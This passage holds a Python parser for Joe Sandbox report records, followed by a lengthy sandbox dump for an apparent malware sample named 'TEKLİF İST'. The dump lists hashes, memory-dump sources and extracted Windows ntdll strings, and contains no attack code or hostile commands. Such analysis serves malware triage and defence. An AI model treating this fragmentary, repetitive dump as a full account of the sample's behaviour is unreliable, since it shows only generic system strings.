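            text_, xrefs = line[2:].rsplit(", xrefs: ", 1)
            rec["strings"].append((text_, xrefs.split(", ")))
        elif section == "Similarity" and line.startswith("• "):
            key, _, value = line[2:].partition(":")
            rec["fields"][key] = value.strip()
            if key == "Instruction Fuzzy Hash":
                records.append(rec)
                rec, section = new_record(), None
    return records


def window_message(call):
    """Name the message a PostThreadMessageW call posts (None for other APIs or unknown values)."""
    if call["name"] != "PostThreadMessageW" or len(call["args"]) < 2 or not call["args"][1].isalnum():
        return None
    return WINDOW_MESSAGES.get(int(call["args"][1], 16))


def api_inventory(records):
    """API name -> sorted call-site addresses across all records, for quick triage."""
    inv = {}
    for rec in records:
        for call in rec["apis"]:
            inv.setdefault(call["name"], set()).add(call["ref"])
    return {k: sorted(v) for k, v in inv.items()}
```

Call parse_records(SAMPLE) to get the three records; api_inventory maps each API to its call sites (RtlFreeHeap at 0041A66D, PostThreadMessageW at 0040836A), and window_message on the PostThreadMessageW entry resolves the 00000111 argument to WM_COMMAND. Headers the parser does not model ("Joe Sandbox IDA Plugin", "Yara matches") are ignored, so the page's full records parse unchanged.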
                                                                                                              Strings
                                                                                                              • @, xrefs: 01BB259B
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01BB2412
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01BB24C0
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01BB22E4
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01BB2506
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01BB2409
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01BB2624
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 01BB261F
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01BB2602
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01BB2498
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01BB25EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              Strings
                                                                                                              • HandleTraces, xrefs: 01BC8C8F
                                                                                                              • VerifierDebug, xrefs: 01BC8CA5
                                                                                                              • VerifierFlags, xrefs: 01BC8C50
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01BC8A67
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01BC8B8F
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01BC8A3D
                                                                                                              • VerifierDlls, xrefs: 01BC8CBD
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B99A11, 01B99A3A
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B99A01
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B99A2A
                                                                                                              • LdrpInitShimEngine, xrefs: 01B999F4, 01B99A07, 01B99A30
                                                                                                              • apphelp.dll, xrefs: 01B36496
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B999ED
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01BB8170
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B7C6C3
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01BB8177, 01BB81EB
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 01BB81E5
                                                                                                              • LdrpInitializeProcess, xrefs: 01B7C6C4
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01BB8181, 01BB81F5
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              Strings
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01BB2180
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01BB2160, 01BB219A, 01BB21BA
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01BB21BF
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01BB219F
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01BB2178
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01BB2165
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              APIs
                                                                                                                • Part of subcall function 01B82DF0: LdrInitializeThunk.NTDLL ref: 01B82DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B80BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B80BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B80D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B80D74
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B78421
                                                                                                              • LdrpInitializeProcess, xrefs: 01B78422
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01B7855E
                                                                                                              • @, xrefs: 01B78591
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: 79b9cbd090dc1b4e9c672ce74db5d4d47a2c054ea7c6d4380ed48b241fadb700
                                                                                                              • Instruction ID: ea30df6b448057c2ccbc228cfa45f54cbb55b571a2f8c966c7ef4a7c548fe852
                                                                                                              • Opcode Fuzzy Hash: 79b9cbd090dc1b4e9c672ce74db5d4d47a2c054ea7c6d4380ed48b241fadb700
                                                                                                              • Instruction Fuzzy Hash: 87918A71508345AFDB29EF65C884FABBAECFB94744F4009AEFA94D2151E370D904CB62
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01BB22B6
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01BB21D9, 01BB22B1
                                                                                                              • .Local, xrefs: 01B728D8
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01BB21DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: 1c7fe8713dc9abaa284ae93cea7de87e571bbadf386d2827b4afa8f680e21d16
                                                                                                              • Instruction ID: f99738267679370e900d72c7dc56dbf3bd17254ac1dbe3c88429b5cab5108e48
                                                                                                              • Opcode Fuzzy Hash: 1c7fe8713dc9abaa284ae93cea7de87e571bbadf386d2827b4afa8f680e21d16
                                                                                                              • Instruction Fuzzy Hash: B0A1AE3590022A9FDF29CF68C884BA9B7B1FF58354F1941F9D918AB251D770AE81CF90
                                                                                                              Strings
                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01BB342A
                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01BB3456
                                                                                                              • RtlDeactivateActivationContext, xrefs: 01BB3425, 01BB3432, 01BB3451
                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01BB3437
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                              • API String ID: 0-1245972979
                                                                                                              • Opcode ID: de792ce2700195149e0942c639aeeacd6b78ecabd6e493147a0a73b573857401
                                                                                                              • Instruction ID: 65ee838b1cb922438b8f22d6a58f49caf3e97fd48f00bcb55e43a3e3886d7ae9
                                                                                                              • Opcode Fuzzy Hash: de792ce2700195149e0942c639aeeacd6b78ecabd6e493147a0a73b573857401
                                                                                                              • Instruction Fuzzy Hash: 206111326007129BDB2ACF1CC881B7AB7E1EF80B51F1486EDE9659B660D774EC01CB91
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01BA106B
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01BA10AE
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01BA0FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01BA1028
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: 60b1c17a8a58cc7048264df00ef5331993951469d303ccbee5e6606e3885d960
                                                                                                              • Instruction ID: 8b806de20d6ee546b05bb6eda1ed9b2f7d51c6755feb8bdbe05a347a0490c073
                                                                                                              • Opcode Fuzzy Hash: 60b1c17a8a58cc7048264df00ef5331993951469d303ccbee5e6606e3885d960
                                                                                                              • Instruction Fuzzy Hash: 817110B19043099FCF25EF18C880BA77FA9EF95B60F4044A8F9488B146D334D589CBD2
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01BAA9A2
                                                                                                              • apphelp.dll, xrefs: 01B62462
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01BAA992
                                                                                                              • LdrpDynamicShimModule, xrefs: 01BAA998
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              • Opcode ID: c777cae5db4fa525af2d6ba5b35209b0e7d08a5bad016bf2c18cd66a2b27f1a7
                                                                                                              • Instruction ID: e31f7345c44824cc23940898723d0bd53d94e18f10c205d2a17caad54cea394a
                                                                                                              • Opcode Fuzzy Hash: c777cae5db4fa525af2d6ba5b35209b0e7d08a5bad016bf2c18cd66a2b27f1a7
                                                                                                              • Instruction Fuzzy Hash: 93316D71A00201EBDB399F6DD881BBA77B8FB94B00F5640D9E9026B255C7B4D941C791
                                                                                                              Strings
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01B5327D
                                                                                                              • HEAP: , xrefs: 01B53264
                                                                                                              • HEAP[%wZ]: , xrefs: 01B53255
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: 06b01803021bde19e3efa8100dd531d85a5d01ec124b5c34dbb2846a0dfb7495
                                                                                                              • Instruction ID: f96039760c2f4e15e972f33973384461f885a5fb1cc77fb305c273a21b35c695
                                                                                                              • Opcode Fuzzy Hash: 06b01803021bde19e3efa8100dd531d85a5d01ec124b5c34dbb2846a0dfb7495
                                                                                                              • Instruction Fuzzy Hash: DD929971A05249DFEB69CF68C440BADBBF1FF48300F1881D9E946AB3A2D735A945CB50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: 52270df81289ad099742842028e46e44bb30460365a6bccc056837d990bc57d7
                                                                                                              • Instruction ID: f61cae4a9d9f34cd0a6345693d92a467d86bbc9f16370acd7b73967150d0399c
                                                                                                              • Opcode Fuzzy Hash: 52270df81289ad099742842028e46e44bb30460365a6bccc056837d990bc57d7
                                                                                                              • Instruction Fuzzy Hash: 61F1AD70A04606DFEB69DF68C884F6AB7F5FF44300F1442A8E9169B395D730EA81CB90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 2994545307-1077428164
                                                                                                              • Opcode ID: ec6ce5e0450f93b34f8a545906d5e5ce1be45e718e7af2bda7814ac6d3a474a4
                                                                                                              • Instruction ID: 07b90582b1a13152b912d5354217226a77ed00e0a00ce40e3df67d869080ee73
                                                                                                              • Opcode Fuzzy Hash: ec6ce5e0450f93b34f8a545906d5e5ce1be45e718e7af2bda7814ac6d3a474a4
                                                                                                              • Instruction Fuzzy Hash: 16C283716083419FDB29CF28C841B6BBBE9EF98754F0489ADF989C7251DB38D805CB52
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: ed67497ac0e1e008972f5dddd080452c5e9c4f80934a12e242d8c1695ab6e72f
                                                                                                              • Instruction ID: 83313d509cb8b1d4da3f84ae1992d21074d6ceed39d03f3937ac8d6948039c46
                                                                                                              • Opcode Fuzzy Hash: ed67497ac0e1e008972f5dddd080452c5e9c4f80934a12e242d8c1695ab6e72f
                                                                                                              • Instruction Fuzzy Hash: 0CA15C719116299BDF35DF68CC88BAABBB8EF48710F1001E9E909E7250D7359E85CF50
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01BAA121
                                                                                                              • LdrpCheckModule, xrefs: 01BAA117
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 01BAA10F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              • Opcode ID: 9326a0c68d789a98a8d13df7e59bacb3f872c3b09bd5a5472c4980bb36c02c36
                                                                                                              • Instruction ID: 9994e2c50de2e92ffec0ec2c15b7ee233fcced5bb20f683b809554472a0b4c9d
                                                                                                              • Opcode Fuzzy Hash: 9326a0c68d789a98a8d13df7e59bacb3f872c3b09bd5a5472c4980bb36c02c36
                                                                                                              • Instruction Fuzzy Hash: AD71AF71A00205DFDF2DEF69C984BAEB7F8EB68604F1444ADE802DB255D738AA41CB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              • Opcode ID: 572b0760bbfbefe5d6101c953ce03b60513b4849f20a6b65dc50caae30a45aaa
                                                                                                              • Instruction ID: 2309964056416fcba25f08d60e4f3e7d18f6075be1100e987aa34cdc9076a07d
                                                                                                              • Opcode Fuzzy Hash: 572b0760bbfbefe5d6101c953ce03b60513b4849f20a6b65dc50caae30a45aaa
                                                                                                              • Instruction Fuzzy Hash: BB61CE30604301DFDB6DDF28C480B6ABBE1FF84704F148699E84ACB292D770E981CB91
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01BB82E8
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 01BB82D7
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 01BB82DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              • Opcode ID: d321091286f6db1b084b3ac365d4460450b3e33ae66fec90dbae4db9ec721496
                                                                                                              • Instruction ID: 497ce651074085d7454b4d415e247ed82d1255154a8e61e6e447285c26baa29b
                                                                                                              • Opcode Fuzzy Hash: d321091286f6db1b084b3ac365d4460450b3e33ae66fec90dbae4db9ec721496
                                                                                                              • Instruction Fuzzy Hash: 6D41F6B1505312ABCB29EB68D941B9BBBE8EF64750F0045AEF959D3250EBB4D800CB91
Strings
• @, xrefs: 01BFC1F1
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01BFC1C5
• PreferredUILanguages, xrefs: 01BFC212
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
Strings
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
Strings
• LdrpCheckRedirection, xrefs: 01BC488F
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01BC4888
• minkernel\ntdll\ldrredirect.c, xrefs: 01BC4899
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
Strings
Similarity
• API ID:
• String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-2558761708
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 01BC2104
• Process initialization failed with status 0x%08lx, xrefs: 01BC20F3
• LdrpInitializationFailure, xrefs: 01BC20FA
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
APIs
Strings
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
Strings
• LdrResSearchResource Exit, xrefs: 01B4AA25
• LdrResSearchResource Enter, xrefs: 01B4AA13
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
Strings
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
Strings
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
Strings
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
Strings
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01B4063D
• kLsE, xrefs: 01B40540
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
Strings
• RtlpResUltimateFallbackInfo Exit, xrefs: 01B4A309
• RtlpResUltimateFallbackInfo Enter, xrefs: 01B4A2FB
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
Strings
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
Strings
Similarity
• API ID:
• String ID: MUI
• API String ID: 0-1339004836
Strings
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 20ecc07d27ee9848902adfd2b3f6a2e8c40785a11e588cc7a45167b33bc2c15e
                                                                                                              • Instruction ID: 8c239911cd266e1dd5f96fca8466181750b93962a9c24e51996c5119bc5b7513
                                                                                                              • Opcode Fuzzy Hash: 20ecc07d27ee9848902adfd2b3f6a2e8c40785a11e588cc7a45167b33bc2c15e
                                                                                                              • Instruction Fuzzy Hash: 03919F3190064AAFDF2AAFA5DC88FAFBBB9EF45740F1400A9F505A7250EB74D901CB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              • Opcode ID: 061b868480bcad4301b33434a4fa66aea2b72fae7290d54a1f8ecc59df7171b2
                                                                                                              • Instruction ID: d121af2b22ff3d6769115ebf7d1a7b94c4fd1148bba8bbcedd522bd542f92f6d
                                                                                                              • Opcode Fuzzy Hash: 061b868480bcad4301b33434a4fa66aea2b72fae7290d54a1f8ecc59df7171b2
                                                                                                              • Instruction Fuzzy Hash: CE715CB5E0021A9BDF2CCF99C990AEDBBB1FF58700F1481AAE905A7641E7B19D41CB50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
